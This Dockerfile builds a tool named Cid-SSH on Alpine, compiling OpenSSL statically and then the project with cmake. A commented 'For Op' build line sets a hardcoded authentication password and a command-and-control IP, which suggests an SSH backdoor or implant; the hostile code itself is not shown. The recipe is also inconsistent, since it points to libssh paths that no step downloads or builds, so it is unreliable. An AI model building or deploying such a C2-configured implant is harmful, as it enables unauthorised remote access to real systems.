FROM alpine:latest
RUN apk add --no-cache build-base cmake autoconf libtool pkgconf git mercurial file linux-headers wget
WORKDIR /tmp/

# Building openssl statically (Requirement for libssh)
RUN wget https://www.openssl.org/source/openssl-1.1.0j.tar.gz && tar xf openssl-1.1.0j.tar.gz
RUN cd openssl-1.1.0j && ./config -fPIC && make && make install

COPY . /Cid-SSH/
WORKDIR /Cid-SSH/

# Building CidSSH
RUN rm -rf build && mkdir build
RUN cd build && cmake -DLIBSSH_LIBRARY=/usr/local/lib/libssh.a -DLIBSSH_INCLUDE=/tmp/libssh-0.8.7/include/ -DLIBSSH_CONFIG_FOLDER=/tmp/libssh-0.8.7/build/ -DCMAKE_BUILD_TYPE=Release .. && make 
# For Op
#RUN mkdir build && cd build && cmake -DLIBSSH_LIBRARY=/usr/local/lib/libssh.a -DLIBSSH_INCLUDE=/tmp/libssh-0.8.7/include/ -DLIBSSH_CONFIG_FOLDER=/tmp/libssh-0.8.7/build/ -DCMAKE_BUILD_TYPE=Release -DPASSWORD_AUTH="xxxxxxxxxx" -DC2_IP="XX.XX.XX.XX" .. && make 
